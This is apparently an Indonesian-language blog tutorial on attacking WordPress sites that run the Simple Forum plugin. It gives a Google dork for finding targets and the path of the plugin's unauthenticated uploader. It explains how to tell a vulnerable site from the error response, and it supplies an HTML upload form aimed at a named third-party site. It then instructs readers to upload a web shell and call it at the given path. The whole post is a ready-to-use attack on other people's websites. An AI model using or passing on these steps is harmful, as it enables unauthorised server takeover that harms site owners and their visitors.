-Dork : inurl:/plugins/simple-forum/
-Exploit : /resources/jscript/ajaxupload/sf-uploader.php
Caranya : Cari Target Dengan Dork Diatas Dengan Google.com , Kembangkan Dork Jika Ingin Dapat Situs Vuln Banyak !
Jika Sudah Dapat :
CONTOH : http://Shape.by/wp-content...ple-forum/
JADI : http://Shape.by/wp-content...loader.php
Jika Keluar Tulisan error ! site bisa vuln ! kalau Access Denied ! Tidak Vuln
Untuk Cara Upload nya Pakai Script Dibawah Jika Kalian Dapat Situs yang Vuln
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Code:
<form enctype="multipart/form-data"
action="http://mamaklub.longtail.sk/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
CATATAN ! http://mamaklub.longtail.sk/wp-content/p...loader.php : Di Ganti Dengan Situs Vuln Tadi , Lalu Save As Dengan Ekstensi .html Lalu Upload Shell Mu Di Form Uploader
Cara memanggil Shell kamu: http://www.site.com/wp-content/plugins/s...ashell.php
cukup sekian tutorial dari Panda semoga bisa bermanfaat dan jangan pernah menyerah
0 komentar:
Posting Komentar